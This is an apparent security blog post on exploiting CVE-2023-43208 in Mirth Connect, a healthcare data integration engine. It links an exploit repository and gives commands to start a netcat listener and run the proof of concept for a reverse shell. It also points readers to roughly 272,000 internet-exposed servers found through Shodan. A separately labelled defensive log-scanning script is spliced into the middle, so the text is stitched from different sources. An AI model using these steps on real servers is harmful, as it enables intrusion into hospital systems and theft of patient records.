gotr00t@mirth:~$

Mirth Connect RCE: When Healthcare Data Meets Insecure Defaults.

From version detection to reverse shell: exploiting critical vulnerabilities in Mirth Connect.

What is Mirth Connect?

Mirth Connect is a healthcare integration engine developed by NextGen Healthcare that streamlines the exchange of health information by transforming and routing data in various formats like HL7 and DICOM between different healthcare systems.

Now that we understand Mirth Connect's role in healthcare, let's dive into the exploitation process.

Before we start hacking, let’s explain CVE-2023-43208.

CVE-2023-43208 is a critical authentication bypass vulnerability in Mirth Connect that allows unauthenticated attackers to access the administrative interface and potentially execute arbitrary code.

What are the affected versions?

Mirth Connect versions prior to 4.4.0 are affected; specifically, versions 4.1.1, 4.2.0, 4.3.0 and earlier.

The Vulnerability

The vulnerability exists in the authentication mechanism: the application fails to properly validate session tokens, which means that attackers can access the admin functions without any credentials.

Exploitation steps

I wrote a PoC that can check a single target and a list of targets for vulnerabilities.

You can download it here: https://github.com/gotr00t0day/NextGen-Mirth Connect-Exploit

As you can see in the picture above, I found a few Mirth Connect servers that might be vulnerable to CVE-2023-43208.

From here you can try to access the admin interface without credentials at /api/users, or you can use the exploit and get a reverse shell.
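For defenders, the useful counterpart to the check above is spotting it in your own logs. The following is an added example, not code from the original post or from the PoC it links: it scans access-log lines from a reverse proxy in front of Mirth Connect (assumed nginx/Apache "combined" format; the sample lines are constructed) and flags successful requests to /api/users from a client that never completed a login via POST /api/users/_login, which is what the unauthenticated access described here would look like. Correlating by client IP rather than by session cookie is a simplification of this example.

```python
import re
from datetime import datetime

# Constructed sample lines in "combined" log format, assumed to come from a
# reverse proxy in front of Mirth Connect (assumption, not data from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:01:02 +0000] "POST /api/users/_login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:10:01:05 +0000] "GET /api/users HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2024:10:02:11 +0000] "GET /api/users HTTP/1.1" 200 2048 "-" "python-requests/2.31"
198.51.100.9 - - [10/Jan/2024:10:02:12 +0000] "POST /api/users HTTP/1.1" 200 1024 "-" "python-requests/2.31"
192.0.2.20 - - [10/Jan/2024:10:03:00 +0000] "GET /api/users HTTP/1.1" 401 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+'
)
LOGIN_PATH = "/api/users/_login"   # Mirth Connect REST login endpoint
ADMIN_PREFIX = "/api/users"        # user-management endpoint named in the post

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_unauthenticated_admin_access(log_text):
    """Return (ip, method, path, iso_timestamp) for every 200 response on
    /api/users* from a client with no earlier successful login in the log."""
    logged_in = set()
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == LOGIN_PATH and rec["status"] == 200:
            logged_in.add(rec["ip"])   # this client authenticated normally
            continue
        if rec["path"].startswith(ADMIN_PREFIX) and rec["status"] == 200 and rec["ip"] not in logged_in:
            findings.append((rec["ip"], rec["method"], rec["path"], rec["ts"].isoformat()))
    return findings

if __name__ == "__main__":
    for finding in find_unauthenticated_admin_access(SAMPLE_LOG):
        print("possible unauthenticated admin API access:", finding)
```

On the sample, only the two 198.51.100.9 requests are flagged: 203.0.113.7 logged in first, and the 401 for 192.0.2.20 is the server rejecting the request as a patched instance should.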

If you use the exploit to get a reverse shell, make sure you use the proper flags and arguments.

Start a netcat listener: nc -lvp 1337

Run the PoC:

python3 mirthconnect_exploit.py -t IP -p PORT -lh localhost -lp 1337 --exploit

If you’re lucky, you should see a connection back on your netcat listener.

Finding vulnerable servers in Shodan

As you can see in the image above, there are 272,724 potential targets; a lot of these are running vulnerable versions.

This blog was created to expose critical vulnerabilities and demonstrate the dangers when system administrators fail to properly patch their applications, highlighting the significant risks this poses. This research is conducted for educational and awareness purposes.

HAPPY HACKING